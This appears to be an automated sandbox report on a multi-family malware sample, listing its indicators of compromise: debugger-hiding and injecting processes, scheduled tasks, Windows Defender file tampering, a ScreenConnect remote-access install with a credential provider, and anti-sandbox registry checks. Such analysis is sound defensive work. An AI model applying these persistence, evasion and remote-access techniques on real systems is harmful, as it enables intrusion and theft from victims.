File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (f63a82ffaf9f93d1)\ukozrnyo.newcfg	ScreenConnect.ClientService.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs

pid	Process
1656	TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE
2324	rapes.exe
1040	rapes.exe
2880	e9ea3a76fa.exe
4912	rapes.exe
4268	2983c11b74.exe
2856	05be0399a2.exe
5460	ae9ab2f9a7.exe
6660	0af0a2f978.exe
7060	50981a7f32.exe
6540	8ffa067850.exe
2532	e2a57b0b34.exe
6288	1310185143.exe
5460	88e128475c.exe
6140	rapes.exe

Suspicious use of SetThreadContext 8 IoCs

description	pid	Process	procid_target
PID 1332 set thread context of 3004	1332	gron12321.exe	288
PID 1764 set thread context of 444	1764	alex1dskfmdsf.exe	308
PID 7060 set thread context of 6500	7060	50981a7f32.exe	359
PID 6540 set thread context of 6712	6540	8ffa067850.exe	361
PID 2532 set thread context of 4008	2532	e2a57b0b34.exe	364
PID 6288 set thread context of 7012	6288	1310185143.exe	366
PID 7088 set thread context of 6892	7088	842890bd89.exe	372
PID 7060 set thread context of 4340	7060	EPTwCQd.exe	382

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsBackstageShell.exe.config	msiexec.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.ClientService.exe	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.WindowsBackstageShell.exe	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File created	C:\Program Files (x86)\ScreenConnect Client (f63a82ffaf9f93d1)\ScreenConnect.Client.dll	msiexec.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe

Drops file in Windows directory 17 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Installer\e5894aa.msi	msiexec.exe
File created	C:\Windows\Installer\SourceHash{0BCCD92A-879F-CC6A-5351-726E204818E7}	msiexec.exe
File created	C:\Windows\Installer\wix{0BCCD92A-879F-CC6A-5351-726E204818E7}.SchedServiceConfig.rmi	MsiExec.exe
File created	C:\Windows\Installer\{0BCCD92A-879F-CC6A-5351-726E204818E7}\DefaultIcon	msiexec.exe
File created	C:\Windows\Tasks\futors.job	amnew.exe
File created	C:\Windows\Installer\e5894aa.msi	msiexec.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI95C4.tmp	msiexec.exe
File created	C:\Windows\Tasks\rapes.job	TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE
File opened for modification	C:\Windows\Installer\{0BCCD92A-879F-CC6A-5351-726E204818E7}\DefaultIcon	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIABBA.tmp	msiexec.exe
File created	C:\Windows\Installer\e5894ac.msi	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9594.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI999D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIAC28.tmp	msiexec.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4324	sc.exe
2648	sc.exe
4972	sc.exe
1228	sc.exe
4788	sc.exe
4028	sc.exe
4972	sc.exe
4452	sc.exe
4500	sc.exe
2172	sc.exe
1656	sc.exe
752	sc.exe
2288	sc.exe
4504	sc.exe
4864	sc.exe
4548	sc.exe
1040	sc.exe
3748	sc.exe
4128	sc.exe
1876	sc.exe
2864	sc.exe
1244	sc.exe
232	sc.exe
4968	sc.exe
4008	sc.exe
2568	sc.exe
1388	sc.exe
3012	sc.exe
1876	sc.exe
2648	sc.exe
2580	sc.exe
3168	sc.exe
1324	sc.exe
2148	sc.exe
5060	sc.exe
4632	sc.exe
3488	sc.exe
1300	sc.exe
3348	sc.exe
3180	sc.exe
4504	sc.exe
4028	sc.exe
5040	sc.exe
872	sc.exe
2864	sc.exe
3816	sc.exe
4500	sc.exe
3204	sc.exe
3596	sc.exe
1452	sc.exe
4840	sc.exe
3092	sc.exe
1816	sc.exe
440	sc.exe
836	sc.exe
4528	sc.exe
3892	sc.exe
4968	sc.exe
5028	sc.exe
3816	sc.exe
4320	sc.exe
3440	sc.exe
3196	sc.exe
4320	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	futors.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PowerShell.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	7ef3f93a66.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	50981a7f32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1310185143.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e9ea3a76fa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	05be0399a2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	88e128475c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	A9cowK5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ScreenConnect.ClientService.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8ffa067850.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	221.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	221.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	A9cowK5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7ef3f93a66.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e269e6c0d6.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	221.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	7ef3f93a66.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ae9ab2f9a7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	e2a57b0b34.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	221.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	amnew.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7d5ce09794.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2983c11b74.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0af0a2f978.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MsiExec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bell_Setup16.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	389dc2db95.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe

Checks SCSI registry key(s) 3 TTPs 5 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000003061842c4a1469410000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800003061842c0000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809003061842c000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d3061842c000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000003061842c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe
Set value (data)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	vssvc.exe

Checks processor information in registry 2 TTPs 20 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	ScreenConnect.WindowsClient.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	ScreenConnect.WindowsClient.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Delays execution with timeout.exe 2 IoCs

pid	Process
3208	timeout.exe
5012	timeout.exe

Kills process with taskkill 5 IoCs

pid	Process
4368	taskkill.exe
3368	taskkill.exe
3032	taskkill.exe
2004	taskkill.exe
1952	taskkill.exe

Modifies data under HKEY_USERS 15 IoCs

description	ioc	Process
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.WindowsClient.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\27\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\28	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.WindowsClient.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\29	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.ClientService.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	ScreenConnect.WindowsClient.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ScreenConnect.ClientService.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\28	msiexec.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ScreenConnect.ClientService.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	ScreenConnect.ClientService.exe

Modifies registry class 40 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\SourceList	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\UseOriginalUrlEncoding = "1"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings	rapes.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-f63a82ffaf9f93d1	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.WindowsCredentialProvider.dll"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}\InprocServer32\ThreadingModel = "Apartment"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\A29DCCB0F978A6CC351527E60284817E	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\f63a82ffaf9f93d1\\"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open\command	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-C7A7-316889DB6DBE}	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\ProductName = "ScreenConnect Client (f63a82ffaf9f93d1)"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\PackageCode = "A29DCCB0F978A6CC351527E60284817E"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\SourceList\Media\1 = ";"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\Version = "402915332"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\URL Protocol	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\A29DCCB0F978A6CC351527E60284817E\Full	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\Assignment = "1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\ProductIcon = "C:\\Windows\\Installer\\{0BCCD92A-879F-CC6A-5351-726E204818E7}\\DefaultIcon"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\A29DCCB0F978A6CC351527E60284817E\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5B15089AFED232366FA328FFFAF9391D	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\sc-f63a82ffaf9f93d1\shell\open\command	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\sc-f63a82ffaf9f93d1\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (f63a82ffaf9f93d1)\\ScreenConnect.WindowsClient.exe\" \"%1\""	msiexec.exe
